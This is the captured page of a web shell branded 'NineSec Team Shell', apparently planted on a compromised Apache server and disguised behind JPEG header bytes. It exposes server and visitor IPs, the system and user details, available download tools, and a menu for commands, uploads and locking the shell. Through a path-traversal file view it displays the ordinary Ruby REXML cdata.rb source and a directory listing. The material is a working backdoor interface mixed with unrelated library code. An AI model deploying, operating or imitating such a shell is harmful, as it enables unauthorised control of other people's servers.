�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /etc/ldap/../etckeeper/../../usr/lib/ruby/2.7.0/singleton/../rexml/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/ldap/../etckeeper/../../usr/lib/ruby/2.7.0/singleton/../rexml/cdata.rb
# frozen_string_literal: false
require_relative "text"

module REXML
  class CData < Text
    START = '<![CDATA['
    STOP = ']]>'
    ILLEGAL = /(\]\]>)/

    #   Constructor.  CData is data between <![CDATA[ ... ]]>
    #
    # _Examples_
    #  CData.new( source )
    #  CData.new( "Here is some CDATA" )
    #  CData.new( "Some unprocessed data", respect_whitespace_TF, parent_element )
    def initialize( first, whitespace=true, parent=nil )
      super( first, whitespace, parent, false, true, ILLEGAL )
    end

    # Make a copy of this object
    #
    # _Examples_
    #  c = CData.new( "Some text" )
    #  d = c.clone
    #  d.to_s        # -> "Some text"
    def clone
      CData.new self
    end

    # Returns the content of this CData object
    #
    # _Examples_
    #  c = CData.new( "Some text" )
    #  c.to_s        # -> "Some text"
    def to_s
      @string
    end

    def value
      @string
    end

    # == DEPRECATED
    # See the rexml/formatters package
    #
    # Generates XML output of this object
    #
    # output::
    #   Where to write the string.  Defaults to $stdout
    # indent::
    #   The amount to indent this node by
    # transitive::
    #   Ignored
    # ie_hack::
    #   Ignored
    #
    # _Examples_
    #  c = CData.new( " Some text " )
    #  c.write( $stdout )     #->  <![CDATA[ Some text ]]>
    def write( output=$stdout, indent=-1, transitive=false, ie_hack=false )
      Kernel.warn( "#{self.class.name}.write is deprecated", uplevel: 1)
      indent( output, indent )
      output << START
      output << @string
      output << STOP
    end
  end
end

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
October 23 2023 6:29:37
root
0755
dtd
--
October 23 2023 6:29:37
root
0755
formatters
--
October 23 2023 6:29:37
root
0755
light
--
October 23 2023 6:29:37
root
0755
parsers
--
October 23 2023 6:29:37
root
0755
validation
--
October 23 2023 6:29:37
root
0755
attlistdecl.rb
1.924 KB
December 25 2019 10:50:58
root
0644
attribute.rb
5.974 KB
December 25 2019 10:50:58
root
0644
cdata.rb
1.586 KB
December 25 2019 10:50:58
root
0644
child.rb
2.661 KB
December 25 2019 10:50:58
root
0644
comment.rb
2.119 KB
December 25 2019 10:50:58
root
0644
doctype.rb
7.969 KB
July 06 2023 12:57:08
root
0644
document.rb
9.55 KB
December 25 2019 10:50:58
root
0644
element.rb
44.529 KB
December 25 2019 10:50:58
root
0644
encoding.rb
1.155 KB
December 25 2019 10:50:58
root
0644
entity.rb
5.401 KB
December 25 2019 10:50:58
root
0644
functions.rb
12.272 KB
December 25 2019 10:50:58
root
0644
instruction.rb
2.14 KB
December 25 2019 10:50:58
root
0644
namespace.rb
1.402 KB
December 25 2019 10:50:58
root
0644
node.rb
2.184 KB
December 25 2019 10:50:58
root
0644
output.rb
0.54 KB
December 25 2019 10:50:58
root
0644
parent.rb
4.272 KB
December 25 2019 10:50:58
root
0644
parseexception.rb
1.253 KB
December 25 2019 10:50:58
root
0644
quickpath.rb
9.122 KB
December 25 2019 10:50:58
root
0644
rexml.rb
1.286 KB
December 25 2019 10:50:58
root
0644
sax2listener.rb
3.606 KB
December 25 2019 10:50:58
root
0644
security.rb
0.805 KB
December 25 2019 10:50:58
root
0644
source.rb
7.716 KB
December 25 2019 10:50:58
root
0644
streamlistener.rb
3.84 KB
December 25 2019 10:50:58
root
0644
text.rb
13.879 KB
December 25 2019 10:50:58
root
0644
undefinednamespaceexception.rb
0.238 KB
December 25 2019 10:50:58
root
0644
xmldecl.rb
2.948 KB
December 25 2019 10:50:58
root
0644
xmltokens.rb
2.324 KB
December 25 2019 10:50:58
root
0644
xpath.rb
3.419 KB
December 25 2019 10:50:58
root
0644
xpath_parser.rb
29.635 KB
December 25 2019 10:50:58
root
0644

NineSec Team - 2022